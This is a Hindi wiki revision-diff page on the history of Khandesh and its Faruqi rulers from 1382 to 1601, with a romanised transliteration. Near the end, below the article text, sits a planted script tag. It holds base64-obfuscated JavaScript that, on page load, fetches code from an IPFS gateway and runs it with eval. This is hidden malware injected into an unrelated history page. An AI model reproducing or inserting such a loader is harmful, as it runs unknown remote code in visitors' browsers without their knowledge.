Difference between revisions of "ख़ानदेश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:मध्य काल (को हटा दिया गया हैं।))
Line 1: Line 1:
[[तुग़लक़ वंश]] के पतन के समय [[फ़िरोज़शाह तुग़लक़]] के सूबेदार मलिक अहमद राजा फ़ारुक़ी ने [[नर्मदा नदी]] एवं [[ताप्ती नदी]] के बीच 1382 ई. में '''ख़ानदेश''' की स्थापना की। इसका नाम ख़ानदेश इस लिए पड़ा, क्योंकि यहाँ के सभी सुल्तानों ने ख़ान की उपाधि से शासन किया। इन शासकों ने [[बुरहानपुर]] को अपनी राजधानी एवं [[असीरगढ़]] को सैनिक मुख्यालय बनाया। मलिक राजा फ़ारुक़ी की 29 अप्रैल, 1399 को मृत्यु हो गयी। ख़ानदेश के अन्य शासक निम्नलिखित थे-
+
[[तुग़लक़ वंश]] के पतन के समय [[फ़िरोज़शाह तुग़लक़]] के सूबेदार मलिक अहमद राजा फ़ारुक़ी ने [[नर्मदा नदी]] एवं [[ताप्ती नदी]] के बीच 1382 ई. में '''ख़ानदेश''' की स्थापना की और साथ ही [[फ़ारुक़ी वंश]] की नींव रखी। इसका नाम ख़ानदेश इस लिए पड़ा, क्योंकि यहाँ के सभी सुल्तानों ने ख़ान की उपाधि से शासन किया। इन शासकों ने [[बुरहानपुर]] को अपनी राजधानी एवं [[असीरगढ़]] को सैनिक मुख्यालय बनाया। मलिक राजा फ़ारुक़ी की 29 अप्रैल, 1399 को मृत्यु हो गयी। ख़ानदेश के अन्य शासक निम्नलिखित थे-
  
 
#नासिर ख़ान फ़ारुक़ी (1400 से 1434 ई.)
 
#नासिर ख़ान फ़ारुक़ी (1400 से 1434 ई.)
Line 15: Line 15:
 
#बहादुर ख़ान (1597 से 1600 ई.)
 
#बहादुर ख़ान (1597 से 1600 ई.)
  
आदिल ख़ान द्वितीय के बाद के फ़ारुक़ी वंश के शासक शक्तिहीन थे। अतः साम्राज्य दलगत राजनीति के अन्तर्गत रहा, जिसका लाभ उठाकर [[अहमदनगर]] एवं [[गुजरात]] ने ख़ानदेश के मामले में हस्तक्षेप प्रारम्भ कर दिया। अन्ततः 1601 ई. में [[अकबर]] ने ख़ानदेश के अन्तिम शासक बहादुर ख़ान को परास्त कर उसको [[मुग़ल]] साम्राज्य में मिला लिया। इस राज्य में स्थापत्य कला के क्षेत्र में लौकिक तथा धार्मिक निर्माण कार्य हुआ, उसमें [[मालवा]] तथा गुजरात की वास्तुकला शैली का व्यापक प्रभाव पड़ा है।
+
आदिल ख़ान द्वितीय के बाद के [[फ़ारुक़ी वंश]] के शासक शक्तिहीन थे। अतः साम्राज्य दलगत राजनीति के अन्तर्गत रहा, जिसका लाभ उठाकर [[अहमदनगर]] एवं [[गुजरात]] ने ख़ानदेश के मामले में हस्तक्षेप प्रारम्भ कर दिया। अन्ततः 1601 ई. में [[अकबर]] ने ख़ानदेश के अन्तिम शासक बहादुर ख़ान को परास्त कर उसको [[मुग़ल]] साम्राज्य में मिला लिया। इस राज्य में स्थापत्य कला के क्षेत्र में लौकिक तथा धार्मिक निर्माण कार्य हुआ, उसमें [[मालवा]] तथा गुजरात की वास्तुकला शैली का व्यापक प्रभाव पड़ा है।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 05:29, 11 April 2011

tugalaq vansh ke patan ke samay firozashah tugalaq ke soobedar malik ahamad raja faruqi ne narmada nadi evan tapti nadi ke bich 1382 ee. mean khanadesh ki sthapana ki aur sath hi faruqi vansh ki nianv rakhi. isaka nam khanadesh is lie p da, kyoanki yahaan ke sabhi sultanoan ne khan ki upadhi se shasan kiya. in shasakoan ne burahanapur ko apani rajadhani evan asiragadh ko sainik mukhyalay banaya. malik raja faruqi ki 29 aprail, 1399 ko mrityu ho gayi. khanadesh ke any shasak nimnalikhit the-

  1. nasir khan faruqi (1400 se 1434 ee.)
  2. miran adil khan faruqi (1437 se 1441 ee.)
  3. miran mubarak khan faruqi (1441 se 1457 ee.)
  4. miran aradal khan dvitiy (1457 se 1501 ee.)
  5. daood khan (1501 se 1508 ee.)
  6. gazani khan 91508 ee.)
  7. ajam humayooan adil khaan tritiy (1509 se 1520 ee.)
  8. miran muhammad khan pratham (1520 se 1535 ee.)
  9. miran mubarak shah faruqi (1535 se 1566 ee.)
  10. miran muhammad shah faruqi (1566 se 1576 ee.)
  11. hasan khan faruqi (1576 ee.)
  12. raja ali khan (1576 se 1597 ee.)
  13. bahadur khan (1597 se 1600 ee.)

adil khan dvitiy ke bad ke faruqi vansh ke shasak shaktihin the. atah samrajy dalagat rajaniti ke antargat raha, jisaka labh uthakar ahamadanagar evan gujarat ne khanadesh ke mamale mean hastakshep prarambh kar diya. antatah 1601 ee. mean akabar ne khanadesh ke antim shasak bahadur khan ko parast kar usako mugal samrajy mean mila liya. is rajy mean sthapaty kala ke kshetr mean laukik tatha dharmik nirman kary hua, usamean malava tatha gujarat ki vastukala shaili ka vyapak prabhav p da hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh